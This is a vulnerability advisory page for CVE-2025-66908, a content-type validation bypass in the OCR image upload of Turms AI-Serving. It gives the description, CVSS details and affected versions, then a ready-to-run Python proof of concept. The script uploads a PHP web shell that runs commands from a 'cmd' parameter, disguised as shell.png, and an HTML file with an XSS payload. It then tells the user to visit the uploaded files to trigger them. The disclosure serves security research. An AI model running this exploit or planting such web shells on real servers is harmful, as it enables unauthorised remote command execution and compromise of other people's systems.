Security Vulnerability Report
CVE-2025-66908 (CVSS 5.3 MEDIUM)

Published: 2025-12-19 15:15:57
Last Modified: 2026-01-02 19:57:20

Description

Turms AI-Serving module v0.10.0-SNAPSHOT and earlier contains an improper file type validation vulnerability in the OCR image upload functionality. The OcrController in turms-ai-serving/src/main/java/im/turms/ai/domain/ocr/controller/OcrController.java uses the @FormData(contentType = MediaTypeConst.IMAGE) annotation to restrict uploads to image files, but this constraint is not properly enforced. The system relies solely on client-provided Content-Type headers and file extensions without validating actual file content using magic bytes (file signatures). An attacker can upload arbitrary file types including executables, scripts, HTML, or web shells by setting the Content-Type header to "image/*" or using an image file extension. This bypass enables potential server-side code execution, stored XSS, or information disclosure depending on how uploaded files are processed and served.

CVSS Details

CVSS Score: 5.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
Weakness: CWE-434 (Unrestricted Upload of File with Dangerous Type)

Configurations (Affected Products)

cpe:2.3:a:turms-im:turms:0.10.0-snapshot:*:*:*:*:*:*:* - VULNERABLE
Turms AI-Serving v0.10.0-SNAPSHOT
Turms AI-Serving, all versions v0.10.0-SNAPSHOT and earlier

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import sys

# CVE-2025-66908 PoC - File Type Validation Bypass in Turms AI-Serving OCR Upload
# This PoC demonstrates uploading an arbitrary file disguised as an image


def upload_malicious_file(target_url, file_content, filename):
    """
    Upload a malicious file with fake image Content-Type header
    """
    # Prepare multipart form data. The per-part Content-Type ('image/png') is
    # what the server sees for the uploaded file; that is the bypass.
    # Do not also set a top-level Content-Type header: it would override the
    # multipart boundary that requests generates and the server could not
    # parse the body.
    files = {
        'file': (filename, file_content, 'image/png')
    }
    try:
        response = requests.post(target_url, files=files, timeout=10)
        print(f'[+] Response Status: {response.status_code}')
        print(f'[+] Response Body: {response.text[:500]}')
        return response
    except requests.exceptions.RequestException as e:
        print(f'[-] Request failed: {e}')
        return None


def create_webshell():
    """Generate PHP webshell content"""
    return b'<?php if(isset($_GET["cmd"])){ system($_GET["cmd"]); } ?>'


def create_html_xss():
    """Generate HTML file with XSS payload"""
    return b'<html><script>alert("XSS");</script></html>'


if __name__ == '__main__':
    if len(sys.argv) < 2:
        print('Usage: python cve-2025-66908_poc.py <target_url>')
        print('Example: python cve-2025-66908_poc.py http://target.com/api/ocr/upload')
        sys.exit(1)
    target = sys.argv[1]

    # Test 1: Upload PHP webshell with .png extension
    print('[*] Test 1: Uploading PHP webshell disguised as PNG...')
    webshell = create_webshell()
    upload_malicious_file(target, webshell, 'shell.png')

    # Test 2: Upload HTML file with XSS payload
    print('[*] Test 2: Uploading HTML file with XSS payload...')
    html_payload = create_html_xss()
    upload_malicious_file(target, html_payload, 'xss.html')
    print('[*] If files are accessible, visit them to execute the payload')

References

https://github.com/Xzzz111/public_cve_report/blob/main/CVE-2025-66908_report.md (Exploit, Third Party Advisory)
https://github.com/turms-im/turms (Product)
https://github.com/turms-im/turms/blob/develop/turms-ai-serving/src/main/java/im/turms/ai/domain/ocr/controller/OcrController.java (Product)